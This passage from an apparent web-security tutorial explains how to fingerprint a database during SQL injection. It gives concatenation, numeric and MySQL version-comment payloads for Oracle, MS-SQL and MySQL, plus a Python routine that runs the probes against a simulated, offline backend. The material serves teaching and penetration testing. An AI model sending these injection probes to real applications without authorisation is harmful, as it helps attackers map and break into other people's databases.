Fingerprinting the Database

Most of the techniques described so far are effective against all of the common database platforms, and any divergences have been accommodated through minor adjustments to syntax. However, as we begin to look at more advanced exploitation techniques, the differences between platforms become more significant, and you will increasingly need to know which type of back-end database you are dealing with.

You have already seen how you can extract the version string of the major database types. Even if this cannot be done for some reason, it is usually possible to fingerprint the database using other methods. One of the most reliable is the different means by which databases concatenate strings. In a query where you control some item of string data, you can supply a particular value in one request and then test different methods of concatenation to produce that string. Each concatenation syntax is valid on only one of the major platforms and causes an error on the others, so when one of them produces the same response as the original value, you have probably identified the type of database being used. The following examples show how the string 'services' could be constructed on the common types of database:

■ Oracle: 'serv'||'ices'

■ MS-SQL: 'serv'+'ices'

■ MySQL: 'serv' 'ices' (note the space: adjacent string literals are concatenated)

If you are injecting into numeric data, then the following attack strings can be used to fingerprint the database. Each of these items will evaluate to 0 on the intended database and generate an error on the other databases, because the function or variable it references does not exist there:
■ Oracle: BITAND(1,1)-BITAND(1,1)
■ MS-SQL: @@PACK_RECEIVED-@@PACK_RECEIVED
■ MySQL: CONNECTION_ID()-CONNECTION_ID()

A further point of interest when fingerprinting databases is the way in which MySQL handles certain types of inline comments. If a comment begins with the exclamation point character followed by a database version number, then the contents of the comment are interpreted as actual SQL, provided that the version of the actual database is equal to or later than that number; otherwise, the contents are ignored and treated as a comment. The version number is written without dots, with two digits each for the minor and release parts, so 3.23.02 becomes 32302. This facility can be used by programmers in a similar way to preprocessor directives in C, enabling them to write different code that will be processed conditionally upon the database version being used. It can also be used by an attacker to fingerprint the exact version of the database, by injecting a series of such comments with different version numbers and observing which of them take effect. For example, injecting the following string will cause the WHERE clause of a SELECT statement to be false if the MySQL version in use is greater than or equal to 3.23.02 (on other platforms, and on older MySQL versions, the whole sequence is an ordinary comment and the query is unchanged):

/*!32302 and 1=0*/
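The following is an added example, not code from the original text, showing how the concatenation and numeric probes above and the MySQL version-comment trick can be driven from a small fingerprinting routine. The HTTP request to the vulnerable application is replaced by an `oracle` callable (an assumption of this example) that returns True when the application's response matches the baseline response obtained for the known-good value. `simulated_backend` is a constructed stand-in for a real target so that the code runs offline; the candidate version list is likewise constructed for illustration.

```python
"""Database fingerprinting via string concatenation, numeric expressions and
MySQL version comments. Added example; `oracle`/`simulated_backend` are
assumptions standing in for requests to a real injectable application."""
import re
from typing import Callable, Dict, List, Optional

# An oracle answers: does this injected expression leave the response
# identical to the baseline response for the original value?
Oracle = Callable[[str], bool]

# String-context probes: each rebuilds the literal 'services' on exactly
# one platform and is a syntax/type error on the others.
CONCAT_PROBES: Dict[str, str] = {
    "Oracle": "'serv'||'ices'",
    "MS-SQL": "'serv'+'ices'",
    "MySQL": "'serv' 'ices'",  # adjacent literals, note the space
}

# Numeric-context probes: each evaluates to 0 on its platform and errors
# elsewhere because the referenced function/variable does not exist there.
NUMERIC_PROBES: Dict[str, str] = {
    "Oracle": "BITAND(1,1)-BITAND(1,1)",
    "MS-SQL": "@@PACK_RECEIVED-@@PACK_RECEIVED",
    "MySQL": "CONNECTION_ID()-CONNECTION_ID()",
}


def fingerprint(oracle: Oracle, probes: Dict[str, str]) -> Optional[str]:
    """Return the one platform whose probe reproduces the baseline response.
    None means no probe (or more than one) matched, i.e. the result is not
    trustworthy and should be re-checked by hand."""
    hits = [db for db, payload in probes.items() if oracle(payload)]
    return hits[0] if len(hits) == 1 else None


def mysql_version_number(version: str) -> int:
    """Encode a dotted MySQL version as the number used in /*!NNNNN */:
    one or more digits for major, two for minor, two for release."""
    major, minor, patch = (int(p) for p in version.split("."))
    return major * 10000 + minor * 100 + patch


def mysql_version_comment(version: str, sql: str) -> str:
    """Build a conditional comment whose body runs only on >= `version`."""
    return f"/*!{mysql_version_number(version)} {sql}*/"


def pin_mysql_version(oracle: Oracle, candidates: List[str]) -> Optional[str]:
    """Binary-search an ascending list of candidate versions. Returns the
    highest candidate whose comment body is executed (server >= that version
    and < the next candidate), or None if even the lowest one is ignored."""
    lo, hi = 0, len(candidates)
    while lo < hi:
        mid = (lo + hi) // 2
        payload = mysql_version_comment(candidates[mid], "and 1=0")
        executed = not oracle(payload)  # WHERE became false: response changed
        if executed:
            lo = mid + 1
        else:
            hi = mid
    return candidates[lo - 1] if lo else None


def simulated_backend(db: str, version: str = "") -> Oracle:
    """Constructed stand-in for the target application (assumption): mimics
    how each platform would react to the probes above."""
    concat_syntax = {
        "Oracle": r"^'(\w*)'\|\|'(\w*)'$",
        "MS-SQL": r"^'(\w*)'\+'(\w*)'$",
        "MySQL": r"^'(\w*)'\s+'(\w*)'$",
    }

    def oracle(payload: str) -> bool:
        m = re.match(concat_syntax[db], payload)
        if m:  # valid concatenation on this platform: compare the result
            return "".join(m.groups()) == "services"
        if payload in NUMERIC_PROBES.values():  # others raise an error
            return payload == NUMERIC_PROBES[db]
        m = re.match(r"^/\*!(\d+) (.*)\*/$", payload)
        if m:
            if db != "MySQL":  # an ordinary comment elsewhere: no change
                return True
            return mysql_version_number(version) < int(m.group(1))
        return False  # anything else is a syntax error: response changed

    return oracle


if __name__ == "__main__":
    target = simulated_backend("MySQL", "5.0.51")
    print("string context:", fingerprint(target, CONCAT_PROBES))
    print("numeric context:", fingerprint(target, NUMERIC_PROBES))
    versions = ["3.23.02", "4.0.0", "4.1.0", "5.0.0", "5.0.51", "5.1.0", "5.5.0"]
    print("MySQL version at least:", pin_mysql_version(target, versions))
```

Note that the version-comment probe only narrows the version down once the platform is already known to be MySQL: on Oracle or MS-SQL the whole sequence is an ordinary comment, so the response never changes and the search reports the server as older than every candidate.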
